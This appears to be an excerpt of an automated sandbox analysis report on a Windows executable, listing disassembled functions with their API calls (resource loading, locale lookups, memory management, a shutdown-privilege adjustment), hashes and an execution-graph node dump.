                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 107509674-3733053543
                                                                            • Opcode ID: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
                                                                            • Instruction ID: 611fb1cec5075bd7f6e538fe0f9c98e62950726bb4ce6d0bef13c3fa82a74cfd
                                                                            • Opcode Fuzzy Hash: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
                                                                            • Instruction Fuzzy Hash: 95F0627068430276E610A6718C47F67228C5B88B08F50483ABE51FA1C3D7BCCC044A6F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409ADA
                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 00409AED
                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000), ref: 00409AFF
                                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4), ref: 00409B10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
                                                                            • Instruction ID: bd400d834a0aeaf6767d0a45abc69bca8fb82328816d2df24890c915d48f9c17
                                                                            • Opcode Fuzzy Hash: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
                                                                            • Instruction Fuzzy Hash: 87E05AD035434625EA6036E718D2B2B62085FA471DF00013FBB00792D3DDBC8C04452E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                            • Instruction ID: dec8dcb9893e8432c944e1b70884c8cc40709e939aac0c2d0d2241257bb7fc31
                                                                            • Opcode Fuzzy Hash: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                            • Instruction Fuzzy Hash: D3D05EB631E6502AE210519B2D85EBB4EACCAC57A4F14443BF648DB242D2248C069776
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: SystemTime
                                                                            • String ID:
                                                                            • API String ID: 2656138-0
                                                                            • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                            • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                            • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                            • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetVersionExA.KERNEL32(?,00406540,00000000,0040654E,?,?,?,?,?,00409B44), ref: 00405C52
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Version
                                                                            • String ID:
                                                                            • API String ID: 1889659487-0
                                                                            • Opcode ID: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
                                                                            • Instruction ID: 6a84e84a5bdb2c7c5b206d002f2a3fc227ad50a79849cf1aa773f1ea3c1cbc6a
                                                                            • Opcode Fuzzy Hash: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
                                                                            • Instruction Fuzzy Hash: 5AC0126040470186E7109B319C42B1672D4A744310F4805396DA4953C2E73C81018A5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                            • Instruction ID: 956cfbd081f07b2254a6d3089f19d76ceb57970edf417c817245e325156cd300
                                                                            • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                            • Instruction Fuzzy Hash: 4432E875E04219DFCB14CF99CA80AADB7B2BF88314F24816AD845B7385DB34AE42CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00406FAD
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406FB3
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00407001
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCloseHandleModuleProc
                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                            • API String ID: 4190037839-2401316094
                                                                            • Opcode ID: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
                                                                            • Instruction ID: 4848c3cc747176469ce0ef08a48ea257d9f62360c4c8e5a9f2e1a14c28c6fa3b
                                                                            • Opcode Fuzzy Hash: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
                                                                            • Instruction Fuzzy Hash: C3217370E04209ABDB10EBB5CD51B9F77A8EB44304F60857BA500F72C1DB7CAA05879E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                            • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                            • String ID:
                                                                            • API String ID: 1694776339-0
                                                                            • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                            • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                            • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                            • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040555C,?,?,?,?,00000000,00000000,00000000,?,0040653B,00000000,0040654E), ref: 0040532E
                                                                              • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                              • Part of subcall function 004051A8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale$DefaultSystem
                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                            • API String ID: 1044490935-665933166
                                                                            • Opcode ID: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
                                                                            • Instruction ID: f22f4b18e1885e1925b87b286fa486de3d96a381b4aec2b7527aff107c54c5fa
                                                                            • Opcode Fuzzy Hash: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
                                                                            • Instruction Fuzzy Hash: 8E514234B00648ABDB00EBA59C91B9F776ADB89304F50957BB514BB3C6CA3DCA058B5C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                            • LocalFree.KERNEL32(004D07C0,00000000,00401AB4), ref: 00401A1B
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,004D07C0,00000000,00401AB4), ref: 00401A3A
                                                                            • LocalFree.KERNEL32(004D17C0,?,00000000,00008000,004D07C0,00000000,00401AB4), ref: 00401A79
                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                            • String ID:
                                                                            • API String ID: 3782394904-0
                                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ExitMessageProcess
                                                                            • String ID: Error$Runtime error at 00000000$9@
                                                                            • API String ID: 1220098344-1503883590
                                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                            • String ID:
                                                                            • API String ID: 262959230-0
                                                                            • Opcode ID: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                            • Opcode Fuzzy Hash: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(00000000,00409B3A), ref: 004030E3
                                                                            • GetCommandLineA.KERNEL32(00000000,00409B3A), ref: 004030EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CommandHandleLineModule
                                                                            • String ID: 8&K$U1hd.@
                                                                            • API String ID: 2123368496-1573593940
                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                            • String ID:
                                                                            • API String ID: 730355536-0
                                                                            • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                            • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040941B
                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040942B
                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040943E
                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 00409448
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastSleep
                                                                            • String ID:
                                                                            • API String ID: 1458359878-0
                                                                            • Opcode ID: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                            • Instruction ID: 2c3041558bff2c9731999a3fdaa5bf7f611e1c5313eca5e15d372d414c244bd5
                                                                            • Opcode Fuzzy Hash: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                            • Instruction Fuzzy Hash: 32F0B472A0811457CB34B5EF9981A6F638DEAD1368751813BF904F3383D578CD0392AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:16%
                                                                            Dynamic/Decrypted Code Coverage:0.8%
                                                                            Signature Coverage:5.5%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:94
                                                                            execution_graph 49226 402584 49227 402598 49226->49227 49228 4025ab 49226->49228 49256 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49227->49256 49229 4025c2 RtlEnterCriticalSection 49228->49229 49230 4025cc 49228->49230 49229->49230 49242 4023b4 13 API calls 49230->49242 49233 40259d 49233->49228 49236 4025a1 49233->49236 49234 4025d9 49238 402635 49234->49238 49239 40262b RtlLeaveCriticalSection 49234->49239 49235 4025d5 49235->49234 49243 402088 49235->49243 49239->49238 49240 4025e5 49240->49234 49257 402210 9 API calls 49240->49257 49242->49235 49244 40209c 49243->49244 49245 4020af 49243->49245 49264 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49244->49264 49247 4020c6 RtlEnterCriticalSection 49245->49247 49250 4020d0 49245->49250 49247->49250 49248 4020a1 49248->49245 49249 4020a5 49248->49249 49252 402106 49249->49252 49250->49252 49258 401f94 49250->49258 49252->49240 49254 4021f1 RtlLeaveCriticalSection 49255 4021fb 49254->49255 49255->49240 49256->49233 49257->49234 49261 401fa4 49258->49261 49259 401fd0 49263 401ff4 49259->49263 49270 401db4 49259->49270 49261->49259 49261->49263 49265 401f0c 49261->49265 49263->49254 49263->49255 49264->49248 49274 40178c 49265->49274 49268 401f29 49268->49261 49271 401e02 49270->49271 49272 401dd2 49270->49272 49271->49272 49297 401d1c 49271->49297 49272->49263 49278 4017a8 49274->49278 49276 4017b2 49293 401678 VirtualAlloc 49276->49293 49278->49276 49279 40180f 49278->49279 49282 401803 49278->49282 49285 4014e4 49278->49285 49294 4013e0 LocalAlloc 49278->49294 49279->49268 49284 401e80 9 API calls 49279->49284 49281 4017be 49281->49279 49295 4015c0 VirtualFree 49282->49295 49284->49268 49286 4014f3 VirtualAlloc 49285->49286 49288 401520 49286->49288 49289 401543 49286->49289 49296 401398 LocalAlloc 49288->49296 49289->49278 49291 40152c 
49291->49289 49292 401530 VirtualFree 49291->49292 49292->49289 49293->49281 49294->49278 49295->49279 49296->49291 49298 401d2e 49297->49298 49299 401d51 49298->49299 49300 401d63 49298->49300 49310 401940 49299->49310 49302 401940 3 API calls 49300->49302 49303 401d61 49302->49303 49309 401d79 49303->49309 49320 401bf8 9 API calls 49303->49320 49305 401d88 49306 401da2 49305->49306 49321 401c4c 9 API calls 49305->49321 49322 401454 LocalAlloc 49306->49322 49309->49272 49311 401966 49310->49311 49312 4019bf 49310->49312 49323 40170c 49311->49323 49312->49303 49316 401983 49317 40199a 49316->49317 49328 4015c0 VirtualFree 49316->49328 49317->49312 49329 401454 LocalAlloc 49317->49329 49320->49305 49321->49306 49322->49309 49326 401743 49323->49326 49324 401783 49327 4013e0 LocalAlloc 49324->49327 49325 40175d VirtualFree 49325->49326 49326->49324 49326->49325 49327->49316 49328->49317 49329->49312 49330 41edc4 49331 41edd3 IsWindowVisible 49330->49331 49332 41ee09 49330->49332 49331->49332 49333 41eddd IsWindowEnabled 49331->49333 49333->49332 49334 41ede7 49333->49334 49337 402648 49334->49337 49336 41edf1 EnableWindow 49336->49332 49338 40264c 49337->49338 49339 402656 49337->49339 49338->49339 49341 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49338->49341 49339->49336 49339->49339 49341->49339 49342 42e24b SetErrorMode 49343 41fac8 49344 41fad1 49343->49344 49347 41fd6c 49344->49347 49346 41fade 49348 41fe5e 49347->49348 49349 41fd83 49347->49349 49348->49346 49349->49348 49368 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 49349->49368 49351 41fdb9 49352 41fde3 49351->49352 49353 41fdbd 49351->49353 49378 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 49352->49378 49369 41fb0c 49353->49369 49357 41fdf1 49359 41fdf5 49357->49359 49360 41fe1b 49357->49360 49358 41fb0c 10 API calls 49362 41fde1 49358->49362 49363 41fb0c 10 API calls 49359->49363 49361 41fb0c 10 API calls 49360->49361 49364 41fe2d 
